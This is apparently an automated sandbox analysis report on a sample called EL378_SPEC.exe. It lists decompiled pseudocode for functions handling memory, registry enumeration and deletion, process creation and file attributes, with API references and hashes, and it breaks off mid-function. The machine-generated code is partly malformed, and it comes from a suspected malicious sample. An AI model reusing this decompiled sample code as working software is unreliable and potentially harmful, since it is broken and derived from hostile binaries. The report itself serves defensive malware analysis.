0x6ecc16fb
0x6ecc16f0
0x6ecc16f3
0x6ecc1702
0x6ecc1703
0x00000000
0x6ecc1703
0x6ecc16f8
0x00000000
0x00000000
0x00000000
0x6ecc16f8

APIs

Part of subcall function 6ECC2351: GlobalFree.KERNEL32(?), ref: 6ECC2A44
Part of subcall function 6ECC2351: GlobalFree.KERNEL32(?), ref: 6ECC2A4A
Part of subcall function 6ECC2351: GlobalFree.KERNEL32(?), ref: 6ECC2A50

GlobalFree.KERNEL32(00000000), ref: 6ECC1738
FreeLibrary.KERNEL32(?), ref: 6ECC17C3
GlobalFree.KERNELBASE(00000000), ref: 6ECC17E9

Part of subcall function 6ECC1FCB: GlobalAlloc.KERNEL32(?,?), ref: 6ECC1FFA

Part of subcall function 6ECC17F7: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,6ECC1708,00000000), ref: 6ECC189A

Part of subcall function 6ECC1F1E: wsprintfW.USER32 ref: 6ECC1F51

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 400056fdfa285ecace616bb1e528557079d20575f6f1b26098589dcb772d0829
Instruction ID: 60e65a3d77d1da24c7a2ae022b7f958c7097446af0eb4c057ab5b2a33527a2bd
Opcode Fuzzy Hash: 400056fdfa285ecace616bb1e528557079d20575f6f1b26098589dcb772d0829
Instruction Fuzzy Hash: 2141D131400649AECBA4DFAEC868BDA37FCBB01F25F104419F86D8A189FB74958DC752

Uniqueness

Uniqueness Score: -1.00%

Function 00401D01 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401D01(void* _a8, intOrPtr _a40, intOrPtr _a48) {
				void* _t6;
				void* _t7;
				void _t10;
				void* _t11;
				intOrPtr _t16;
				void* _t20;
				void* _t22;
				void _t23;
				void* _t26;

				_t22 =  *0x40b100; // 0x0
				if(_a48 == 0) {
					if(_t6 == 0) {
						_t7 = GlobalAlloc("true", 0x804); // executed
						_push(_a40);
						_t23 = _t7;
						_push(_t23 + 4);
						E00405EBA();
						_t10 =  *0x40b100; // 0x0
						 *_t23 = _t10;
						 *0x40b100 = _t23;
						goto L14;
					} else {
						if(_t22 == 0) {
							_t16 = 1;
						} else {
							E00406B1A(_t20, _t22 + 4);
							 *0x40b100 =  *_t22;
							GlobalFree(_t22);
							goto L14;
						}
					}
					goto L15;
				} else {
					while(1) {
						__ecx = __ecx - 1;
						if(__esi == 0) {
							break;
						}
						__esi =  *__esi;
						if(__ecx != 0) {
							continue;
						} else {
							if(__esi == 0) {
								break;
							} else {
								__esi = __esi + 4;
								__edi = L"Call";
								__eax = E00406B1A(__edi, __esi);
								__eax =  *0x40b100; // 0x0
								__eax = E00406B1A(__esi, __eax);
								__eax =  *0x40b100; // 0x0
								_push(__edi);
								_push(__eax);
								__eax = E00406B1A();
								L14:
								_t16 =  *((intOrPtr*)(_t26 + 0x10));
								L15:
								 *0x435ac8 =  *0x435ac8 + _t16;
								_t11 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push("true");
					_push(E00405EBA());
					__eax = E00406AA8();
					_t11 = 0x7fffffff;
				}
				L17:
				return _t11;
			}

0x00401d05
0x00401d0d
0x00401d65
0x00401d93
0x00401d99
0x00401d9d
0x00401da2
0x00401da3
0x00401da8
0x00401dad
0x00401daf
0x00000000
0x00401d67
0x00401d69
0x0040170b
0x00401d6f
0x00401d74
0x00401d7c
0x00401d81
0x00000000
0x00401d81
0x00401d69
0x00000000
0x00401d0f
0x00401d0f
0x00401d0f
0x00401d12
0x00000000
0x00000000
0x00401d14
0x00401d18
0x00000000
0x00401d1a
0x00401d1c
0x00000000
0x00401d1e
0x00401d1e
0x00401d21
0x00401d28
0x00401d2d
0x00401d37
0x00401d3c
0x00401d41
0x00401d45
0x00401d46
0x00402ea1
0x00402ea1
0x00402ea5
0x00402ea5
0x00402eab
0x00402eab
0x00401d1c
0x00000000
0x00401d18
0x00401d50
0x00401d55
0x00401d5d
0x00401a97
0x004015dc
0x004015dc
0x00402ead
0x00402eb7

APIs

GlobalFree.KERNEL32(00000000), ref: 00401D81
GlobalAlloc.KERNELBASE(?,00000804), ref: 00401D93

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

Strings

Call, xrefs: 00401D21, 00401D27, 00401D41

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Global$AllocFreelstrcat
String ID: Call
API String ID: 238967769-1824292864
Opcode ID: ea8e00b31fc5630ef22f753c00b902b8b415464c32ecf8ecdf4f01d8fa161779
Instruction ID: 6aac856f3036c6303f510296de49dce4321192db318f402462ff6f52e68ea50d
Opcode Fuzzy Hash: ea8e00b31fc5630ef22f753c00b902b8b415464c32ecf8ecdf4f01d8fa161779
Instruction Fuzzy Hash: B711D271A11624ABD7209F50DD94A2B72A8FF44759B05443BFD46FB2D1C378B8018BEC

Uniqueness

Uniqueness Score: -1.00%

Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004027B0(short* __edi, void* __ebp, void* _a12, void* _a52, void* _a76) {
				void* _t8;
				void* _t15;
				void* _t18;
				void* _t27;

				_t8 = E004030C1(_t15, _t18, _t27, 0x20019); // executed
				E00403002(3);
				 *__edi = 0;
				if(_t8 != 0) {
					__ecx = 0x3ff;
					 *(__esp + 0x50) = 0x3ff;
					__eflags =  *((intOrPtr*)(__esp + 0x38)) - __ebp;
					if( *((intOrPtr*)(__esp + 0x38)) == __ebp) {
						__ecx = __esp + 0x60;
						__eax = RegEnumValueW(__esi, __eax, __edi, __esp + 0x60, __ebp, __ebp, __ebp, __ebp);
						0 = 1;
						__eflags = __eax;
						 *((intOrPtr*)(__esp + 0x10)) = __ebx;
					} else {
						__eax = RegEnumKeyW(__esi, __eax, __edi, 0x3ff);
					}
					__eax = 0;
					__edi[0x3ff] = __ax;
					__eax = RegCloseKey(__esi);
					__ebx =  *((intOrPtr*)(__esp + 0x10));
				}
				 *0x435ac8 =  *0x435ac8 + 1;
				return 0;
			}

0x004027b5
0x004027be
0x004027ca
0x004027cf
0x004027d5
0x004027da
0x004027de
0x004027e2
0x004027f4
0x004027fc
0x00402804
0x00402805
0x0040280a
0x004027e4
0x004027e8
0x004027e8
0x0040280e
0x00402811
0x00402818
0x00402ea1
0x00402ea1
0x00402ea5
0x00402eb7

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: b46cacae281d1184c7c84bd9f72f61e273c768f7e9ccf463ebf68afd38743971
Instruction ID: 15f2e51ca923653d163ef63657e7ddfb51ce7db4af5690b84a8befcbfff3b97a
Opcode Fuzzy Hash: b46cacae281d1184c7c84bd9f72f61e273c768f7e9ccf463ebf68afd38743971
Instruction Fuzzy Hash: 9301B531658341ABD3189F61EC88D3BB7ACFF85315F10093EF542E2181D7B86900876A

Uniqueness

Uniqueness Score: -1.00%

Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402728(short* __edi, void* _a20, void* _a48, void* _a72) {
				int* __ebp;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t28;

				_t12 = E004030C1(_t18, _t20, _t28, 0x20019); // executed
				E0040303E(_t20, 0x33);
				 *__edi = 0;
				if(_t12 != 0) {
					__ecx = __esp + 0x50;
					 *(__esp + 0x50) = 0x800;
					__ecx = __esp + 0x24;
					__eax = RegQueryValueExW(__esi, __eax, __ebp, __esp + 0x24, __edi, __esp + 0x50); // executed
					0 = 1;
					__eflags = __eax;
					if(__eax != 0) {
						L9:
						__eax = 0;
						 *__edi = __ax;
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 4;
						if( *((intOrPtr*)(__esp + 0x1c)) == 4) {
							__eflags =  *(__esp + 0x3c);
							__eax = E0040661F(__edi,  *__edi);
							goto L2;
						} else {
							__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 1;
							if( *((intOrPtr*)(__esp + 0x1c)) == 1) {
								L7:
								__eax = 0;
								__edi[0x7fe] = __ax;
								L2:
								__eax = RegCloseKey(__esi); // executed
								goto L10;
							} else {
								__eflags =  *((intOrPtr*)(__esp + 0x1c)) - 2;
								if( *((intOrPtr*)(__esp + 0x1c)) != 2) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
					L11:
					return 0;
				}
				L10:
				 *0x435ac8 =  *0x435ac8 + 1;
				goto L11;
			}

0x0040272d
0x00402736
0x0040273d
0x00402742
0x00402748
0x0040274c
0x00402756
0x0040275e
0x00402766
0x00402767
0x00402769
0x004027a4
0x004027a4
0x004027a8
0x00000000
0x0040276b
0x0040276b
0x00402770
0x00402792
0x0040279a
0x00000000
0x00402772
0x00402772
0x00402776
0x0040277f
0x00402783
0x00402785
0x0040271c
0x0040271d
0x00000000
0x00402778
0x00402778
0x0040277d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040277d
0x00402776
0x00402770
0x00402eab
0x00402eb7
0x00402eb7
0x00402ea5
0x00402ea5
0x00000000

APIs

RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb12B3.tmp,?,?,00000011,00000002), ref: 0040271D
RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040275E

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 4cd1d9cc3bf1777f8ea3db62a511f2da858761b9b4148003de5ccdbbc2434c8c
Instruction ID: fb228a38f7146265a3f721d89abc8bf78f6fe6bd0b338e84b9d16a0e51430f88
Opcode Fuzzy Hash: 4cd1d9cc3bf1777f8ea3db62a511f2da858761b9b4148003de5ccdbbc2434c8c
Instruction Fuzzy Hash: 5C11C235658302AFD7149FA4D98863BB3A4EF84315F10093FF102A21D1D7B85909CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401399(signed int _a4) {
				intOrPtr* _t6;
				signed int _t10;
				int _t12;
				void* _t16;
				signed int _t17;
				void* _t18;
				signed int _t20;
				void* _t21;

				_t20 = _a4;
				if(_t20 < 0) {
					L10:
					return 0;
				}
				while(1) {
					_t6 =  *0x435a30 + _t20 * 0x1c;
					if( *_t6 == 1) {
						goto L10;
					}
					_push(_t6);
					if(E0040154A() == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t16 = E004030FD(_t7);
					if(_t16 != 0) {
						_t17 = _t16 - 1;
						_t10 = _t20;
						_t20 = _t17;
						_t18 = _t17 - _t10;
					} else {
						_t18 = _t16 + 1;
						_t20 = _t20 + 1;
					}
					if( *((intOrPtr*)(_t21 + 0x10)) != 0) {
						_t12 =  *0x4349d0 + _t18;
						 *0x4349d0 = _t12;
						SendMessageW( *(_t21 + 0x1c), 0x402, MulDiv(_t12, 0x7530,  *0x4349cc), 0); // executed
					}
					if(_t20 >= 0) {
						continue;
					} else {
						goto L10;
					}
				}
				goto L10;
			}

0x0040139a
0x004013a1
0x00401413
0x00000000
0x00401413
0x004013a8
0x004013b0
0x004013b5
0x00000000
0x00000000
0x004013b7
0x004013bf
0x00000000
0x0040141a
0x004013c7
0x004013cb
0x004013d1
0x004013d2
0x004013d4
0x004013d6
0x004013cd
0x004013cd
0x004013ce
0x004013ce
0x004013dd
0x004013ec
0x004013f4
0x00401409
0x00401409
0x00401411
0x00000000
0x00000000
0x00000000
0x00000000
0x00401411
0x00000000

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
Instruction ID: 538a9e804dfe71f8462b772bc95ac31ea7b37d3b99b6caf0eca62282663b68d4
Opcode Fuzzy Hash: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
Instruction Fuzzy Hash: 4701D472A152309BD7196F28AC09B6B3699AB80711F15453AF901F72F1D2B89C018758

Uniqueness

Uniqueness Score: -1.00%

Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025FF(void* __ebp, signed int _a52, intOrPtr _a56, intOrPtr _a60) {
				void* _t9;
				signed int _t14;
				void* _t16;
				void* _t20;
				long _t22;
				void* _t25;

				_t22 = 1;
				_t30 = _a56 - __ebp;
				if(_a56 != __ebp) {
					_t22 = E0040307C(_t20, _a60, E0040303E(_t20, 0x22), _a52 >> 1);
				} else {
					_t9 = E004030C1(_t16, _t20, _t30, 2); // executed
					_t25 = _t9;
					if(_t25 != 0) {
						_t22 = RegDeleteValueW(_t25, E0040303E(_t20, 0x33));
						RegCloseKey(_t25);
					}
				}
				_t14 = 0 | _t22 != 0x00000000;
				 *0x435ac8 =  *0x435ac8 + _t14;
				return 0;
			}

0x00402601
0x00402602
0x00402606
0x00402648
0x00402608
0x0040260a
0x0040260f
0x00402613
0x00402625
0x00402627
0x00402627
0x00402613
0x0040264e
0x00402ea5
0x00402eb7

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
RegCloseKey.ADVAPI32(00000000), ref: 00402627

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 7d9b9e65408846c590e7b8876d8f67edd050b095ff447458a8fbe16232e7be29
Instruction ID: 5f348ce6c2db00307db5fd01af11d87f06065e179f09fd272fc5be425d392e88
Opcode Fuzzy Hash: 7d9b9e65408846c590e7b8876d8f67edd050b095ff447458a8fbe16232e7be29
Instruction Fuzzy Hash: 29F02433545601B7E310ABA49C4AA7E766DABD03A2F10053FFA02A61C5CA7E8C42822D

Uniqueness

Uniqueness Score: -1.00%

Function 004066D6 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004066D6(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42fd78->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, "true", 0, 0, 0x42fd78,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004066dc
0x004066ff
0x00406707
0x0040670c
0x00000000
0x00406712
0x00406716

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FD78,?), ref: 004066FF
CloseHandle.KERNEL32(?), ref: 0040670C

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 56b83460f623c560f9136c4b0375a20ff073fe194eb282a2dd1e719b426acf2b
Instruction ID: 0c6c23135c748ad7b6e02b48b863ea359631b5b673f9ca8adb803affa24eb5bb
Opcode Fuzzy Hash: 56b83460f623c560f9136c4b0375a20ff073fe194eb282a2dd1e719b426acf2b
Instruction Fuzzy Hash: F3E04FF0600619BFFB009B64EC09F7B777CEB40204F904435BD11E6151E3749C148A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040691B Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040691B(WCHAR* _a4, long _a8, long _a12) {
				long _t5;
				void* _t7;

				_t5 = GetFileAttributesW(_a4); // executed
				_t6 =  ==  ? 0 : _t5;
				_t7 = CreateFileW(_a4, _a8, "true", 0, _a12,  ==  ? 0 : _t5, 0); // executed
				return _t7;
			}

0x0040691f
0x0040692c
0x0040693f
0x00406945

APIs

GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\EL378_SPEC.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
Instruction ID: d43685c7aa133134ae341259a1979053aa5ebee8cfee21dedca447a2e346f0f1
Opcode Fuzzy Hash: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
Instruction Fuzzy Hash: 77D09E71218202AEEF055F20DE4AF1FBA65EF84710F104A2CF6A6D40F0D6718C24AA11

Uniqueness

Uniqueness Score: -1.00%

Function 00406B9D Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B9D(WCHAR* _a4) {
				signed int _t3;
				signed int _t8;

				_t3 = GetFileAttributesW(_a4); // executed
				_t8 = _t3;
				if(_t8 != 0xffffffff) {
					SetFileAttributesW(_a4, _t8 & 0xfffffffe);
				}
				return _t8;
			}

0x00406ba2
0x00406ba8
0x00406bad
0x00406bb9
0x00406bb9
0x00406bc2

APIs

GetFileAttributesW.KERNELBASE(?,?,00406591,?,?,00000000,004068AE,?,?,?,?), ref: 00406BA2
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BB9

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
Instruction ID: 2641cd0fcf7a615d2272f2c652f3c677170a534def33f5957a60d90ba1304b54
Opcode Fuzzy Hash: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
Instruction Fuzzy Hash: 11D0A7712040316BC6042738DC0C45ABA56DB853707018735F9F6A22F1D7300C2186D4

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC2D14 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6ECC2D14(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

